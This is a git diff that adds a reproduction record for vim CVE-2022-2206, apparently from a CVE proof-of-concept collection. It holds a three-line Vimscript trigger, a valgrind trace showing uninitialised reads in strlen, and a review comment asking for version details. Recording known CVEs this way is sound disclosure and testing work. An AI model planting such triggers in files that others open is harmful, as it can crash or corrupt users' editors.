diff --git a/cve/vim/2022/CVE-2022-2206/README.md b/cve/vim/2022/CVE-2022-2206/README.md
new file mode 100644
index 0000000000000000000000000000000000000000..8d8311a9f187b70f1823d0bdb6a2c26d550d2314
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-2206/README.md
@@ -0,0 +1,55 @@
+### 漏洞复现
+```shell
+$ valgrind vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_vim01.txt -c :qa!
+==20351== Memcheck, a memory error detector
+==20351== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
+==20351== Using Valgrind-3.18.1 and LibVEX; rerun with -h for copyright info
+==20351== Command: vim -u NONE -i NONE -n -m -X -Z -e -s -S ./poc_vim01.txt -c :qa!
+==20351==
+==20351== Conditional jump or move depends on uninitialised value(s)
+==20351== at 0x4842D78: strlen (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
+==20351== by 0x207E42: ??? (in /usr/bin/vim.basic)
+==20351== by 0x18FC57: ??? (in /usr/bin/vim.basic)
+==20351== by 0x333989: ??? (in /usr/bin/vim.basic)
+==20351== by 0x333BCC: ??? (in /usr/bin/vim.basic)
+==20351== by 0x1EBA65: ??? (in /usr/bin/vim.basic)
+==20351== by 0x1EBFEC: ??? (in /usr/bin/vim.basic)
+==20351== by 0x176EED: ??? (in /usr/bin/vim.basic)
+==20351== by 0x218EB5: ??? (in /usr/bin/vim.basic)
+==20351== by 0x219F0F: ??? (in /usr/bin/vim.basic)
+==20351== by 0x220CE5: ??? (in /usr/bin/vim.basic)
+==20351== by 0x1A9554: ??? (in /usr/bin/vim.basic)
+==20351==
+==20351== Conditional jump or move depends on uninitialised value(s)
+==20351== at 0x4842D78: strlen (in /usr/libexec/valgrind/vgpreload_memcheck-amd64-linux.so)
+==20351== by 0x333545: ??? (in /usr/bin/vim.basic)
+==20351== by 0x333922: ??? (in /usr/bin/vim.basic)
+==20351== by 0x333BCC: ??? (in /usr/bin/vim.basic)
+==20351== by 0x1EBA65: ??? (in /usr/bin/vim.basic)
+==20351== by 0x1EBFEC: ??? (in /usr/bin/vim.basic)
+==20351== by 0x176EED: ??? (in /usr/bin/vim.basic)
+==20351== by 0x218EB5: ??? (in /usr/bin/vim.basic)
+==20351== by 0x219F0F: ??? (in /usr/bin/vim.basic)
+==20351== by 0x220CE5: ??? (in /usr/bin/vim.basic)
+==20351== by 0x1A9554: ??? (in /usr/bin/vim.basic)
+==20351== by 0x1A9717: ???
(in /usr/bin/vim.basic)
+==20351==
+==20351==
+==20351== HEAP SUMMARY:
+==20351== in use at exit: 100,874 bytes in 595 blocks
+==20351== total heap usage: 1,630 allocs, 1,035 frees, 500,373 bytes allocated
+==20351==
+==20351== LEAK SUMMARY:
+==20351== definitely lost: 0 bytes in 0 blocks
+==20351== indirectly lost: 0 bytes in 0 blocks
+==20351== possibly lost: 1,490 bytes in 25 blocks
+==20351== still reachable: 99,384 bytes in 570 blocks
+==20351== of which reachable via heuristic:
+==20351== newarray : 1,536 bytes in 16 blocks
+==20351== suppressed: 0 bytes in 0 blocks
+==20351== Rerun with --leak-check=full to see details of leaked memory
+==20351==
+==20351== Use --track-origins=yes to see where uninitialised values come from
+==20351== For lists of detected and suppressed errors, rerun with: -s
+==20351== ERROR SUMMARY: 2 errors from 2 contexts (suppressed: 0 from 0)
+```
\ No newline at end of file
diff --git a/cve/vim/2022/CVE-2022-2206/poc_vim01.txt b/cve/vim/2022/CVE-2022-2206/poc_vim01.txt
new file mode 100644
index 0000000000000000000000000000000000000000..78ffcefd5eee7ba79f6090c521e7b78600054111
--- /dev/null
+++ b/cve/vim/2022/CVE-2022-2206/poc_vim01.txt
@@ -0,0 +1,3 @@
+se encoding=iso8859
+sil!wi0 0
+sil0norm0o
\ No newline at end of file
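Review bot: The PoC script records neither the vim version it was verified against nor the upstream commit that fixes CVE-2022-2206, so a reader cannot tell whether these three lines still reproduce the uninitialised read on a current build. Vimscript accepts `"` comment lines, so a first line such as `" CVE-2022-2206 - verified on vim <VERSION-PLACEHOLDER>, fixed upstream in <COMMIT-PLACEHOLDER>` would pin the reproduction and should not affect the commands that follow. The valgrind trace in the accompanying README is also unsymbolized (every vim frame is `???`), so the record does not show which vim function performs the bad read; rerunning against a build with debug symbols and, as valgrind's own output suggests, `--track-origins=yes` would make it far more useful for confirming that a fix actually closes the defect.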